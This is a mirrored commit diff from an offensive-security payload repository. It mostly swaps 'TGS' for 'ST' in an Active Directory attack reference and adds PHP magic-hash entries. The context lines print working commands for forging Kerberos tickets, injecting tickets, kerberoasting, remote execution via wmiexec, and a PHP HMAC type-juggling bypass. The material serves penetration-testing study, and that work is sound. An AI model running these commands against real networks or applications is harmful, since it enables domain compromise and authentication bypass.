mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 14:22:47 +00:00
Fixing TGS/ST
This commit is contained in:
parent
9e2471a472
commit
2be739ea4f
3 changed files with 25 additions and 21 deletions
|
@ -721,7 +721,7 @@ Requirements:
|
|||
|
||||
#### samAccountName spoofing
|
||||
|
||||
> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a TGS to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid TGS for the domain controller.
|
||||
> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a ST to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid ST for the domain controller.
|
||||
|
||||
**Requirements**
|
||||
|
||||
|
@ -1670,7 +1670,7 @@ Mitigations:
|
|||
|
||||
### Pass-the-Ticket Silver Tickets
|
||||
|
||||
Forging a TGS require machine account password (key) or NTLM hash of the service account.
|
||||
Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account.
|
||||
|
||||
```powershell
|
||||
# Create a ticket for the service
|
||||
|
@ -1707,7 +1707,7 @@ Mitigations:
|
|||
|
||||
> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
|
||||
|
||||
Any valid domain user can request a kerberos ticket (TGS) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
|
||||
Any valid domain user can request a kerberos ticket (ST) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
|
||||
|
||||
|
||||
* [GetUserSPNs](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py) from Impacket Suite
|
||||
|
@ -2650,10 +2650,10 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi
|
|||
# Get a TGT using the newly acquired certificate via PKINIT
|
||||
proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR
|
||||
|
||||
# Get a TGS for the target account
|
||||
# Get a ST (service ticket) for the target account
|
||||
proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v
|
||||
|
||||
# Utilize the TGS for future activity
|
||||
# Utilize the ST for future activity
|
||||
export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache
|
||||
proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab
|
||||
```
|
||||
|
@ -2751,7 +2751,7 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
|
|||
* using bloodyAD:
|
||||
`bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'`
|
||||
|
||||
* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it.
|
||||
* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a Service Ticket (ST), then grab its hash and kerberoast it.
|
||||
```powershell
|
||||
# Check for interesting permissions on accounts:
|
||||
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
|
||||
|
@ -3117,14 +3117,14 @@ mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /
|
|||
mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
|
||||
```
|
||||
|
||||
#### Use the Trust Ticket file to get a TGS for the targeted service
|
||||
#### Use the Trust Ticket file to get a ST for the targeted service
|
||||
|
||||
```powershell
|
||||
.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
|
||||
.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
|
||||
```
|
||||
|
||||
Inject the TGS file and access the targeted service with the spoofed rights.
|
||||
Inject the ST file and access the targeted service with the spoofed rights.
|
||||
|
||||
```powershell
|
||||
kirbikator lsa .\ticket.kirbi
|
||||
|
@ -3161,7 +3161,7 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma
|
|||
|
||||
### Kerberos Unconstrained Delegation
|
||||
|
||||
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||
> The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||
|
||||
> When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory.
|
||||
|
||||
|
@ -3318,7 +3318,7 @@ PS> ls \\dc01.offense.local\c$
|
|||
|
||||
Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
||||
|
||||
> The user sends a TGS to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a TGS for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||
> The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||
|
||||
1. Import **Powermad** and **Powerview**
|
||||
|
||||
|
|
|
@ -956,9 +956,8 @@ Example: "Windows Help and Support" (Windows + F1), search for "command prompt",
|
|||
Look for vuln drivers loaded, we often don't spend enough time looking at this:
|
||||
|
||||
```powershell
|
||||
# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery
|
||||
|
||||
PS C:\Users\Swissky> driverquery.exe /fo table
|
||||
# Native binary
|
||||
PS C:\Users\Swissky> driverquery.exe /fo table /si
|
||||
Module Name Display Name Driver Type Link Date
|
||||
============ ====================== ============= ======================
|
||||
1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM
|
||||
|
@ -972,6 +971,7 @@ acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM
|
|||
ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM
|
||||
<SNIP>
|
||||
|
||||
# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery
|
||||
PS C:\Users\Swissky> DriverQuery.exe --no-msft
|
||||
[+] Enumerating driver services...
|
||||
[+] Checking file signatures...
|
||||
|
|
|
@ -52,22 +52,22 @@ function validate_cookie($cookie,$key){
|
|||
...
|
||||
```
|
||||
|
||||
The $cookie variable is provided by the user. The $key variable is a secret and unknown to the user.
|
||||
The `$cookie` variable is provided by the user. The $key variable is a secret and unknown to the user.
|
||||
|
||||
If we can make the calculated hash string Zero-like, and provide "0" in the $cookie['hmac'], the check will pass.
|
||||
If we can make the calculated hash string Zero-like, and provide "0" in the `$cookie['hmac']`, the check will pass.
|
||||
|
||||
```
|
||||
```ps1
|
||||
"0e768261251903820937390661668547" == "0"
|
||||
```
|
||||
|
||||
We have control over 3 elements in the cookie:
|
||||
- $username - username you are targeting, probably "admin"
|
||||
- $hmac - the provided hash, "0"
|
||||
- $expiration - a UNIX timestamp, must be in the future
|
||||
- `$username` - username you are targeting, probably "admin"
|
||||
- `$hmac` - the provided hash, "0"
|
||||
- `$expiration` - a UNIX timestamp, must be in the future
|
||||
|
||||
Increase the expiration timestamp enough times and we will eventually get a Zero-like calculated HMAC.
|
||||
|
||||
```
|
||||
```ps1
|
||||
hash_hmac(admin|1424869663) -> "e716865d1953e310498068ee39922f49"
|
||||
hash_hmac(admin|1424869664) -> "8c9a492d316efb5e358ceefe3829bde4"
|
||||
hash_hmac(admin|1424869665) -> "9f7cdbe744fc2dae1202431c7c66334b"
|
||||
|
@ -80,8 +80,10 @@ hash_hmac(admin|1835970773) -> "0e174892301580325162390102935332" // "0e17489230
|
|||
|
||||
If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float.
|
||||
|
||||
| Hash | “Magic” Number / String | Magic Hash | Found By / Description |
|
||||
| Hash | "Magic" Number / String | Magic Hash | Found By / Description |
|
||||
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
|
||||
| MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
|
||||
| MD4 | IiF+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
|
||||
| MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
|
||||
| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
|
||||
| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
|
||||
|
@ -106,3 +108,5 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
|
|||
* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
|
||||
* [Magic Hashes - WhiteHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
|
||||
* [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf)
|
||||
* [spaze/hashes - Magic hashes – PHP hash "collisions"](https://github.com/spaze/hashes)
|
||||
* [(Super) Magic Hashes - Mon 07 October 2019 - myst404 (@myst404_)](https://offsec.almond.consulting/super-magic-hash.html)
|
Loading…
Reference in a new issue